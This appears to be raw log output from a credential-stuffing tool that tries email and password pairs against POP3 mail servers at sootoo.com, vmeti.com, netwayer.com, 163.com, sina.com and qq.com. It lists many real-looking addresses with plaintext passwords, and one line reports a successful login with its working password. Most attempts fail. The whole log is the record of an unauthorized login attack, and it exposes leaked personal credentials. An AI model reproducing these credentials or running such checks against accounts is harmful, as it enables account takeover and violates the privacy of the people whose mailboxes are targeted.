[+] checking 'zhongwm069@sootoo.com' 'wang082' 'mail.sootoo.com'
[!] chekcing zhongwm069@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm070@sootoo.com' 'wang086' 'mail.sootoo.com'
[!] chekcing zhongwm070@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm071@sootoo.com' '123456mima' 'mail.sootoo.com'
[!] chekcing zhongwm071@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm072@sootoo.com' '123456mima' 'mail.sootoo.com'
[!] chekcing zhongwm072@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm073@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm073@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm074@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm074@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm075@sootoo.com' 'zhongwm091' 'mail.sootoo.com'
[!] chekcing zhongwm075@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm076@sootoo.com' 'sutu092' 'mail.sootoo.com'
[!] chekcing zhongwm076@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm077@sootoo.com' 'zhongwm093' 'mail.sootoo.com'
[!] chekcing zhongwm077@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm078@sootoo.com' 'zhongwm094' 'mail.sootoo.com'
[!] chekcing zhongwm078@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm079@sootoo.com' 'zhongwm095' 'mail.sootoo.com'
[!] chekcing zhongwm079@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm080@sootoo.com' 'zhongwm096' 'mail.sootoo.com'
[!] chekcing zhongwm080@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm101@sootoo.com' 'zhongwm097' 'mail.sootoo.com'
[!] chekcing zhongwm101@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm102@sootoo.com' 'zhongwm098' 'mail.sootoo.com'
[!] chekcing zhongwm102@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm103@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm103@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm104@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm104@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm105@sootoo.com' 'sootoo7694' 'mail.sootoo.com'
[!] chekcing zhongwm105@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm106@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm106@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm107@sootoo.com' 'sootoo3641' 'mail.sootoo.com'
[!] chekcing zhongwm107@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm108@sootoo.com' 'wang105' 'mail.sootoo.com'
[!] chekcing zhongwm108@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm109@sootoo.com' 'wang106' 'mail.sootoo.com'
[!] chekcing zhongwm109@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm110@sootoo.com' 'sutuchuanmei' 'mail.sootoo.com'
[!] chekcing zhongwm110@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm111@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm111@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm112@sootoo.com' '199108' 'mail.sootoo.com'
[!] chekcing zhongwm112@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm113@sootoo.com' '062755' 'mail.sootoo.com'
[!] chekcing zhongwm113@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm114@sootoo.com' 'zhongwm1314' 'mail.sootoo.com'
[!] chekcing zhongwm114@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm115@sootoo.com' 'zhongwm114' 'mail.sootoo.com'
[!] chekcing zhongwm115@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm116@sootoo.com' 'zhongwm123' 'mail.sootoo.com'
[!] chekcing zhongwm116@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm117@sootoo.com' 'wangdao124' 'mail.sootoo.com'
[!] chekcing zhongwm117@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm118@sootoo.com' 'wangdao125' 'mail.sootoo.com'
[!] chekcing zhongwm118@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm119@sootoo.com' 'wangdao126' 'mail.sootoo.com'
[!] chekcing zhongwm119@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm120@sootoo.com' 'wang900' 'mail.sootoo.com'
[!] chekcing zhongwm120@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm121@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm121@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm122@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm122@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm123@sootoo.com' 'wangzd123' 'mail.sootoo.com'
[!] chekcing zhongwm123@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm100@vmeti.com' 'zhongwm099' 'vmeti.com'
[!] chekcing zhongwm100@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm099@vmeti.com' 'wdzx098' 'vmeti.com'
[!] chekcing zhongwm099@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm094@vmeti.com' 'sutu093' 'vmeti.com'
[!] chekcing zhongwm094@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm098@vmeti.com' 'sutu097' 'vmeti.com'
[!] chekcing zhongwm098@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm096@vmeti.com' 'wdzx095' 'vmeti.com'
[!] chekcing zhongwm096@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm095@vmeti.com' 'zhongwm094' 'vmeti.com'
[!] chekcing zhongwm095@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm097@vmeti.com' 'mll7873655' 'vmeti.com'
[!] chekcing zhongwm097@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'malu18810@sina.com' 'mll7873655' 'pop.sina.com'
[!] chekcing malu18810@sina.com failed, reason:-ERR authorization failed
[+] checking 'wetuijian@163.com' 'we112233' 'pop3.163.com'
[!] success, user is wetuijian@163.com, password is we112233
[+] checking 'jane_su51@163.com' '123456a' 'pop3.163.com'
[!] chekcing jane_su51@163.com failed, reason:-ERR Unable to log on
[+] checking 'changna@sootoo.com' 'zhongwm597' 'mail.sootoo.com'
[!] chekcing changna@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'jiayue@vmeti.com' '19880410' 'vmeti.com'
[!] chekcing jiayue@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'jimokubaobei7848@163.com' '19880410' 'pop3.163.com'
[!] chekcing jimokubaobei7848@163.com failed, reason:-ERR Unable to log on
[+] checking 'haipo1023@qq.com' 'ysz5271314' 'pop.qq.com'
[!] chekcing haipo1023@qq.com failed, reason:-ERR 登录失败，请使用安全连接（如ssl），详细说明请查看: http://service.mail.qq.com/cgi-bin/help?id=28
[+] checking 'zhongwm070@netwayer.com' 'sutuyanjiuyuan' 'netwayer.com'
[!] chekcing zhongwm070@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'michellechenx@163.com' 'cx1051220064' 'pop3.163.com'
[!] chekcing michellechenx@163.com failed, reason:-ERR Unable to log on
[+] checking 'Galaxydreamer@qq.com' 'kelvinleeyap' 'pop.qq.com'
[!] chekcing Galaxydreamer@qq.com failed, reason:-ERR 登录失败，请使用安全连接（如ssl），详细说明请查看: http://service.mail.qq.com/cgi-bin/help?id=28
[+] checking 'zhongwm064@netwayer.com' 'sootoo123' 'netwayer.com'
[!] chekcing zhongwm064@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm065@netwayer.com' 'sootoo123' 'netwayer.com'
[!] chekcing zhongwm065@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm090@vmeti.com' 'sutuyanjiuyuan' 'vmeti.com'
[!] chekcing zhongwm090@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhaopf@vmeti.com' 'zpf.456' 'vmeti.com'
[!] chekcing zhaopf@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'dingdaoshi@163.com' 'weixin1269712515' 'pop3.163.com'
[!] chekcing dingdaoshi@163.com failed, reason:-ERR Unable to log on
[+] checking 'zcx275596361@qq.com' 'zcx15972713900' 'pop.qq.com'
[!] chekcing zcx275596361@qq.com failed, reason:-ERR 登录失败，请使用安全连接（如ssl），详细说明请查看: http://service.mail.qq.com/cgi-bin/help?id=28
[+] checking 'zhongwm170@sootoo.com' 'wanglei86' 'mail.sootoo.com'
[!] chekcing zhongwm170@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm123@netwayer.com' 'woshi123' 'netwayer.com'
[!] chekcing zhongwm123@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm124@sootoo.com' 'wangzd120' 'mail.sootoo.com'
[!] chekcing zhongwm124@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm125@sootoo.com' 'zhongwm121' 'mail.sootoo.com'
[!] chekcing zhongwm125@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm126@sootoo.com' 'sutu123' 'mail.sootoo.com'
[!] chekcing zhongwm126@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm127@sootoo.com' 'zhongwm9516' 'mail.sootoo.com'
[!] chekcing zhongwm127@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm128@sootoo.com' 'zhongwm421' 'mail.sootoo.com'
[!] chekcing zhongwm128@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm129@sootoo.com' 'zhongwm521' 'mail.sootoo.com'
[!] chekcing zhongwm129@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm130@sootoo.com' 'zhongwm621' 'mail.sootoo.com'
[!] chekcing zhongwm130@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm131@sootoo.com' 'zhongwm1927' 'mail.sootoo.com'
[!] chekcing zhongwm131@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm132@sootoo.com' 'wangdzx128' 'mail.sootoo.com'
[!] chekcing zhongwm132@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm133@sootoo.com' 'wangdzx129' 'mail.sootoo.com'
[!] chekcing zhongwm133@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm134@sootoo.com' 'wangdao130' 'mail.sootoo.com'
[!] chekcing zhongwm134@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm135@sootoo.com' 'wangdao131' 'mail.sootoo.com'
[!] chekcing zhongwm135@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm136@sootoo.com' 'zhongwm115' 'mail.sootoo.com'
[!] chekcing zhongwm136@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm137@sootoo.com' 'zhongwm3721' 'mail.sootoo.com'
[!] chekcing zhongwm137@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm138@sootoo.com' 'zhongwm331' 'mail.sootoo.com'
[!] chekcing zhongwm138@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm139@sootoo.com' 'zhongwm431' 'mail.sootoo.com'
[!] chekcing zhongwm139@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm140@sootoo.com' 'sutu135' 'mail.sootoo.com'
[!] chekcing zhongwm140@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm141@sootoo.com' 'wangzd136' 'mail.sootoo.com'
[!] chekcing zhongwm141@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm142@sootoo.com' 'sutu371' 'mail.sootoo.com'
[!] chekcing zhongwm142@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm143@sootoo.com' 'zhongwm831' 'mail.sootoo.com'
[!] chekcing zhongwm143@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm144@sootoo.com' 'zhongwm139' 'mail.sootoo.com'
[!] chekcing zhongwm144@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm145@sootoo.com' 'sutu140' 'mail.sootoo.com'
[!] chekcing zhongwm145@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm146@sootoo.com' 'zhongwm141' 'mail.sootoo.com'
[!] chekcing zhongwm146@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm147@sootoo.com' 'zhongwm2541' 'mail.sootoo.com'
[!] chekcing zhongwm147@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm148@sootoo.com' 'zhongwm341' 'mail.sootoo.com'
[!] chekcing zhongwm148@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm149@sootoo.com' 'sutu144' 'mail.sootoo.com'
[!] chekcing zhongwm149@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm150@sootoo.com' 'zhongwm451' 'mail.sootoo.com'
[!] chekcing zhongwm150@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm151@sootoo.com' 'zhongwm461' 'mail.sootoo.com'
[!] chekcing zhongwm151@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm152@sootoo.com' 'sutu147' 'mail.sootoo.com'
[!] chekcing zhongwm152@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm153@sootoo.com' 'zhongwm418' 'mail.sootoo.com'
[!] chekcing zhongwm153@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm154@sootoo.com' 'zhongwm149' 'mail.sootoo.com'
[!] chekcing zhongwm154@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm155@sootoo.com' 'zhongwm501' 'mail.sootoo.com'
[!] chekcing zhongwm155@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm156@sootoo.com' 'zhongwm151' 'mail.sootoo.com'
[!] chekcing zhongwm156@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm157@sootoo.com' 'zhongwm152' 'mail.sootoo.com'
[!] chekcing zhongwm157@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm158@sootoo.com' 'zhongwm351' 'mail.sootoo.com'
[!] chekcing zhongwm158@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm159@sootoo.com' 'zhongwm451' 'mail.sootoo.com'
[!] chekcing zhongwm159@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm160@sootoo.com' 'zhongwm155' 'mail.sootoo.com'
[!] chekcing zhongwm160@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm161@sootoo.com' 'zhongwm156' 'mail.sootoo.com'
[!] chekcing zhongwm161@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm162@sootoo.com' 'zhongwm157' 'mail.sootoo.com'
[!] chekcing zhongwm162@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm163@sootoo.com' 'zhongwm158' 'mail.sootoo.com'
[!] chekcing zhongwm163@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm164@sootoo.com' 'zhongwm159' 'mail.sootoo.com'
[!] chekcing zhongwm164@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm165@sootoo.com' 'wangzd160' 'mail.sootoo.com'
[!] chekcing zhongwm165@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm166@sootoo.com' 'wangzd161' 'mail.sootoo.com'
[!] chekcing zhongwm166@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm167@sootoo.com' 'wangzd126' 'mail.sootoo.com'
[!] chekcing zhongwm167@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm168@sootoo.com' 'wangzd136' 'mail.sootoo.com'
[!] chekcing zhongwm168@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm169@sootoo.com' 'wangzd641' 'mail.sootoo.com'
[!] chekcing zhongwm169@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm171@sootoo.com' 'wangzd561' 'mail.sootoo.com'
[!] chekcing zhongwm171@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm172@sootoo.com' 'wangzd661' 'mail.sootoo.com'
[!] chekcing zhongwm172@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm173@sootoo.com' 'wangzd176' 'mail.sootoo.com'
[!] chekcing zhongwm173@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm174@sootoo.com' 'wangzd186' 'mail.sootoo.com'
[!] chekcing zhongwm174@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm175@sootoo.com' 'wangzd961' 'mail.sootoo.com'
[!] chekcing zhongwm175@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm176@sootoo.com' 'wangzd017' 'mail.sootoo.com'
[!] chekcing zhongwm176@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm177@sootoo.com' 'wangzd171' 'mail.sootoo.com'
[!] chekcing zhongwm177@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm178@sootoo.com' 'wangzd271' 'mail.sootoo.com'
[!] chekcing zhongwm178@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm179@sootoo.com' 'zhongwm173' 'mail.sootoo.com'
[!] chekcing zhongwm179@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm180@sootoo.com' 'zhongwm174' 'mail.sootoo.com'
[!] chekcing zhongwm180@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm181@sootoo.com' 'zhongwm175' 'mail.sootoo.com'
[!] chekcing zhongwm181@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm182@sootoo.com' 'zhongwm671' 'mail.sootoo.com'
[!] chekcing zhongwm182@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm183@sootoo.com' 'zhongwm771' 'mail.sootoo.com'
[!] chekcing zhongwm183@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm184@sootoo.com' 'zhongwm871' 'mail.sootoo.com'
[!] chekcing zhongwm184@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm185@sootoo.com' 'zhongwm197' 'mail.sootoo.com'
[!] chekcing zhongwm185@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm186@sootoo.com' 'zhongwm081' 'mail.sootoo.com'
[!] chekcing zhongwm186@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm187@sootoo.com' 'zhongwm181' 'mail.sootoo.com'
[!] chekcing zhongwm187@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm188@sootoo.com' 'zhongwm281' 'mail.sootoo.com'
[!] chekcing zhongwm188@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm189@sootoo.com' 'zhongwm183' 'mail.sootoo.com'
[!] chekcing zhongwm189@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm190@sootoo.com' 'zhongwm148' 'mail.sootoo.com'
[!] chekcing zhongwm190@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm191@sootoo.com' 'zhongwm581' 'mail.sootoo.com'
[!] chekcing zhongwm191@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm192@sootoo.com' 'zhongwm681' 'mail.sootoo.com'
[!] chekcing zhongwm192@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm193@sootoo.com' 'zhongwm781' 'mail.sootoo.com'
[!] chekcing zhongwm193@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm194@sootoo.com' 'zhongwm881' 'mail.sootoo.com'
[!] chekcing zhongwm194@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm195@sootoo.com' 'zhongwm891' 'mail.sootoo.com'
[!] chekcing zhongwm195@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm196@sootoo.com' 'zhongwm019' 'mail.sootoo.com'
[!] chekcing zhongwm196@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm197@sootoo.com' 'zhongwm191' 'mail.sootoo.com'
[!] chekcing zhongwm197@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm198@sootoo.com' 'zhongwm291' 'mail.sootoo.com'
[!] chekcing zhongwm198@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm199@sootoo.com' 'zhongwm391' 'mail.sootoo.com'
[!] chekcing zhongwm199@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm200@sootoo.com' 'zhongwm149' 'mail.sootoo.com'
[!] chekcing zhongwm200@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm101@netwayer.com' 'zhongwm195' 'netwayer.com'
[!] chekcing zhongwm101@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm102@netwayer.com' 'zhongwm691' 'netwayer.com'
[!] chekcing zhongwm102@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm103@netwayer.com' 'zhongwm179' 'netwayer.com'
[!] chekcing zhongwm103@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm104@netwayer.com' 'zhongwm199' 'netwayer.com'
[!] chekcing zhongwm104@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm105@netwayer.com' 'zhongwm002' 'netwayer.com'
[!] chekcing zhongwm105@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm106@netwayer.com' 'zhongwm012' 'netwayer.com'
[!] chekcing zhongwm106@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm107@netwayer.com' 'zhongwm5022' 'netwayer.com'
[!] chekcing zhongwm107@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm108@netwayer.com' 'zhongwm302' 'netwayer.com'
[!] chekcing zhongwm108@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm109@netwayer.com' 'zhongwm042' 'netwayer.com'
[!] chekcing zhongwm109@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm110@netwayer.com' 'zhongwm5609' 'netwayer.com'
[!] chekcing zhongwm110@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm111@netwayer.com' 'zhongwm026' 'netwayer.com'
[!] chekcing zhongwm111@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm112@netwayer.com' 'zhongwm072' 'netwayer.com'
[!] chekcing zhongwm112@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm113@netwayer.com' 'zhongwm4528' 'netwayer.com'
[!] chekcing zhongwm113@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm114@netwayer.com' 'zhongwm092' 'netwayer.com'
[!] chekcing zhongwm114@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm115@netwayer.com' 'wangzd210' 'netwayer.com'
[!] chekcing zhongwm115@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm116@netwayer.com' 'sutu211' 'netwayer.com'
[!] chekcing zhongwm116@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm117@netwayer.com' 'zhongwm212' 'netwayer.com'
[!] chekcing zhongwm117@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm118@netwayer.com' 'zhongwm321' 'netwayer.com'
[!] chekcing zhongwm118@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm119@netwayer.com' 'zhongwm142' 'netwayer.com'
[!] chekcing zhongwm119@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm001@vmeti.com' 'zhongwm521' 'vmeti.com'
[!] chekcing zhongwm001@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm002@vmeti.com' 'zhongwm162' 'vmeti.com'
[!] chekcing zhongwm002@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm003@vmeti.com' 'sutu172' 'vmeti.com'
[!] chekcing zhongwm003@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm004@vmeti.com' 'sootoo218' 'vmeti.com'
[!] chekcing zhongwm004@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm005@vmeti.com' 'zhongwm267' 'vmeti.com'
[!] chekcing zhongwm005@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm006@vmeti.com' 'wangzd631' 'vmeti.com'
[!] chekcing zhongwm006@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm007@vmeti.com' 'sutu179' 'vmeti.com'
[!] chekcing zhongwm007@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm008@vmeti.com' 'zhongwm857' 'vmeti.com'
[!] chekcing zhongwm008@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm009@vmeti.com' 'sootoo900' 'vmeti.com'
[!] chekcing zhongwm009@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm010@vmeti.com' 'zhongwm100' 'vmeti.com'
[!] chekcing zhongwm010@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm011@vmeti.com' 'sutu110' 'vmeti.com'
[!] chekcing zhongwm011@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm012@vmeti.com' 'sootoo210' 'vmeti.com'
[!] chekcing zhongwm012@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm013@vmeti.com' 'zhongwm130' 'vmeti.com'
[!] chekcing zhongwm013@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm014@vmeti.com' 'zhongwm410' 'vmeti.com'
[!] chekcing zhongwm014@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm015@vmeti.com' 'wangzd150' 'vmeti.com'
[!] chekcing zhongwm015@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm016@vmeti.com' 'sootoo160' 'vmeti.com'
[!] chekcing zhongwm016@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm017@vmeti.com' 'sutu107' 'vmeti.com'
[!] chekcing zhongwm017@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm018@vmeti.com' 'zhongwm810' 'vmeti.com'
[!] chekcing zhongwm018@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm019@vmeti.com' 'sootoo109' 'vmeti.com'
[!] chekcing zhongwm019@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm020@vmeti.com' 'zhongwm200' 'vmeti.com'
[!] chekcing zhongwm020@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm021@vmeti.com' 'sootoo210' 'vmeti.com'
[!] chekcing zhongwm021@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm022@vmeti.com' 'sutu207' 'vmeti.com'
[!] chekcing zhongwm022@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm023@vmeti.com' 'zhongwm203' 'vmeti.com'
[!] chekcing zhongwm023@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm025@vmeti.com' 'zhongwm520' 'vmeti.com'
[!] chekcing zhongwm025@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm026@vmeti.com' 'sutu206' 'vmeti.com'
[!] chekcing zhongwm026@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm027@vmeti.com' 'sootoo720' 'vmeti.com'
[!] chekcing zhongwm027@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm028@vmeti.com' 'zhongwm208' 'vmeti.com'
[!] chekcing zhongwm028@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm029@vmeti.com' 'sootoo209' 'vmeti.com'
[!] chekcing zhongwm029@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm030@vmeti.com' 'sootoo030' 'vmeti.com'
[!] chekcing zhongwm030@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm031@vmeti.com' 'sootoo130' 'vmeti.com'
[!] chekcing zhongwm031@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm032@vmeti.com' 'zhongwm1630' 'vmeti.com'
[!] chekcing zhongwm032@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm033@vmeti.com' 'sutu330' 'vmeti.com'
[!] chekcing zhongwm033@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm034@vmeti.com' 'sootoo1589' 'vmeti.com'
[!] chekcing zhongwm034@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm035@vmeti.com' 'sootoo305' 'vmeti.com'
[!] chekcing zhongwm035@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm036@vmeti.com' 'wangzd360' 'vmeti.com'
[!] chekcing zhongwm036@vmeti.com failed, reason:-ERR Authentication failed.
